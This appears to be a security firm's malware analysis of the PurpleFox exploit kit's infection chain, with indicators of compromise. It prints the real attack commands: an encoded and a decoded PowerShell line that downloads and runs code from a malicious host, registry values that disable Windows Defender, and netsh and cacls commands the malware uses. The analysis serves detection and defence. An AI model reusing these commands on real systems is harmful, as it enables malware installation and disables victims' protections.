PurpleFox: analysis of the compromise chain

In January 2021, we detected and managed security alerts related to workstation compromise attempts executed through the PurpleFox Exploit Kit.

The following image represents the compromise schema we observed during our analysis:

Exploit Kit & Purple Fox

An Exploit Kit is a toolkit of offensive instruments used by threat actors to compromise workstations during Internet browsing. The kit typically exploits vulnerabilities in browsers and software such as Adobe Flash, Java, and Microsoft Silverlight.

PurpleFox is an exploit kit designed to execute PowerShell code for downloading rootkit malware. First identified in 2018, the following is a list of technical articles addressing this threat:

• Purple Fox Trojan burst out globally and infected more than 30,000 users | 360 Total Security Blog
• ‘Purple Fox’ Malware Can Rootkit and Abuse PowerShell (trendmicro.com)
• Purple Fox EK Adds Exploits for CVE-2020-0674 and CVE-2019-1458 to its Arsenal | Proofpoint US
• Purple Fox EK | New CVEs, Steganography, and Virtualization Added to Attack Flow – SentinelLabs (sentinelone.com)

The Compromise Chain

1. Compromise Initiation

As observed in previous analyses, the attack originates during navigation to the web page hxxp://speedjudgmentacceleration[.]com .

By exploiting an Adobe Flash vulnerability, the workstation compromise chain is initiated via the command:

mshta vbscript:createobject("wscript.shell").run("PowerShell -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADsAJABpACsAKwApAA0ACgB7AA0ACgBpAGUAeAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcgBhAHcAYwBkAG4ALgBnAGkAdABoAGEAYwBrAC4AYwB5AG8AdQAvAHUAcAAuAHAAaABwAD8AawBlAHkAPQAxACIAKQANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA4ADAADQAKAH0ADQAKAA==",0)(window.close)

Base64 decoding yields:

for($i=1;$i -le 10;$i++) { iex(new-object net.webclient).downloadstring("http://rawcdn.githack.cyou/up.php?key=1") Start-Sleep 180 }

This command executes a download (10 attempts) and launches additional malicious code hosted at hxxp://rawcdn[.]githack[.]cyou/up[.]php?key=1 containing further instructions for the final payload.

2. System Modifications and Controls

The script begins by defining a new type within which the MsiInstallProduct and MsiSetInternalUI functions from the msi.dll library are imported, necessary for malware installation and suppression of the installation pop-up.

Subsequently, the script defines a command block that will be converted to a string and base64-encoded. The command set is used to download and install, via MsiInstallProduct, one of two resources present in $msipathALL. The entire operation is placed in a loop that terminates only when the registry value HKCU:\Software\7-Zip\StayOnTop is found.

Both resources, despite presenting different file extensions, are identical MSI files (same hash). This is the final payload for endpoint compromise:

SHA-256 d88ce4ccca6bc536dd3b80374be5e3f5ec9ffd96dc122352386dd4ca9af01cfc

3. Administrative privilege verification

Before executing the encoded command through a new PowerShell call, the malware verifies possession of administrative privileges:

Upon failure, based on system architecture, scripts containing exploits are downloaded and executed to perform local privilege escalation activities (T1548.004).

x32 hxxp://rawcdn[.]githack[.]cyou/up[.]php?key=3
x64 hxxp://rawcdn[.]githack[.]cyou/up[.]php?key=4

4. The role of the MSI file

The rootkit is downloaded from the URLs:

• hxxp://rawcdn[.]githack[.]cyou/up.php?key=2
• hxxp://rawcdn[.]githack[.]com/x7hGFE28oiG8kDre/BGuoFr0ACb9E0frq/afb90fd8276b3530cf1e526e60f8e1d61077e2a5/M001.jpg

As previously highlighted, both files are the same dropper in the form of an MSI installer that, during the installation process, creates the following files on the system:

• a file with .ini extension
• a file with .log or .xml extension (based on system architecture)

The MSI malware, after saving the two files, performs several modifications to the system registry:

• creates the value HKCU:\Software\7-Zip\StayOnTop which will be used as a control to verify successful installation
• disables Windows Defender by creating the values
  HKCU\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
• sets operations to execute upon system restart:
  HKLM\System\CurrentControlSet\Control\SessionManager\PendingFileRenameOperations
\??\C:\Windows\AppPatch\Acpsens.dll, ,
\??\C:\Windows\system32\sens.dll, \??\C:\Windows\AppPatch\Acpsens.dll,
\??\C:\Windows\system32\sens.dll, ,
\??\C:\Windows\.xml, \??\C:\Windows\system32\sens.dll,
\??\C:\Windows\AppPatch\Ke583427.xsl, ,
\??\C:\Windows\.ini, \??\C:\Windows\AppPatch\Ke583427.xsl

5. System modifications

Finally, the malware applies modifications to the system firewall (TCP and UDP ports) and alters permissions on jscript.dll and cscript.exe. Detection of such registry and file system alterations through Managed Detection and Response capabilities enables rapid identification of post-exploitation persistence mechanisms (T1547.001, T1112).

"C:\Windows\SysWOW64\netsh.exe" ipsec static add filterlist name=Filter1 "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP "C:\Windows\SysWOW64\netsh.exe" ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1 "C:\Windows\SysWOW64\netsh.exe" ipsec static set policy name=qianye assign=y "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\jscript.dll "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\jscript.dll /E /P everyone:N "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\jscript.dll "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\jscript.dll /E /P everyone:N "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\cscript.exe "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\cscript.exe /E /P everyone:N "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\cscript.exe "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\cscript.exe /E /P everyone:N

The malware concludes its activities by executing the command: 

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 900; Restart-Computer -Force

which consists of a system restart after 15 minutes, forcing execution of the sens.dll library upon reboot.

This library proves central to persistence and control of the compromised system. By exploiting service creation, the malware is launched with the creation of an svchost process and subsequent injection of the shellcode.

Indicators of Compromise

SHA-256

• d88ce4ccca6bc536dd3b80374be5e3f5ec9ffd96dc122352386dd4ca9af01cfc MSI installer

• 9845e02032d02130bde3ffe2a16ec9706893aa9c8db5712beed6f129a74ffb35 sens.dll (x64) – VirusTotal

• bcefd583e2562fbf38b28118eda0957ac96c3945d12868eaa9bc06f93da5e4db  sens.dll (x32) – VirusTotal

Domains

• speedjudgmentacceleration[.]com
• rawcdn[.]githack[.]cyou
• rawcdn[.]githack[.]com

Defensive teams should prioritize detection of IPsec filter manipulation (T1562.004 — Impair Defenses: Disable or Modify System Firewall) combined with DLL injection patterns targeting system libraries, as this combination indicates post-exploitation persistence activity.